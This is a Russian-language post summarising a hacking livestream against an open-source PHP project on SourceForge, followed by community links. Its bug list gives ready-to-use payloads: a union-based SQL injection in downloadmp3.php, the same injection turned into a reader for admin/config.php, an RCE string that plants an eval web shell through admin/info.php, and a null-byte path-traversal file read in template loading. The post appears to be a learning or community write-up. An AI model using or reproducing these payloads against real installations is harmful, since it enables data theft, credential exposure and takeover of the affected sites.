Друзья, ниже небольшая выжимка из стрима!
❗️❕❗️Стрим доступен по той же ссылке. Запись осталась
После эфира было много комментариев по поводу ведения стрима, каюсь, я только учусь.
В следующий раз постараюсь составить какой-то предварительный план и меньше отвлекаться на чат и донаты.
Возможно придется делать каждые минут 20 остановки на чат.
Итак, к багам
Тезисно по стриму:
- Ломали
https://sourceforge.net/projects/nice-stash/files/Нашли:
1. union based SQLi
File: /downloadmp3.php
Payload:
?download=3'+union+select+1,2,3,4,5,6--+
Вывод в имени аттача
Эту же sqli можно использовать в качестве читалки файлов:
Payload:
?download=3'+union+select+1,2,3,4,5,'../../admin/config.php'--+
2. RCE
File: /admin/info.php
Payload:
&datetype=US'; if(isset($_REQUEST['cmd']))eval($_REQUEST['cmd']);echo'
3. Бага с читалкой файлов, по поводу которой был холивар в чате:
if(isset($_GET['template'])) {
$templatedata = openTemplates("template/".$_GET['template'].".tpl.html");
}
Если установлена версия php, где не пофиксили null-byte, можно обрезать суффикс с помощью %00
Ссылки нашего комьюнити ниже:
http://no.offence.site/yt - YouTube
http://no.offence.site/group - Telegram group
http://no.offence.site/channel - Telegram channel
Спасибо, что вы поддерживаете меня просмотрами, лайками, комментариями.
Я буду делать стримы качественнее от раза к разу, и буду рад вас видеть!
До скорого!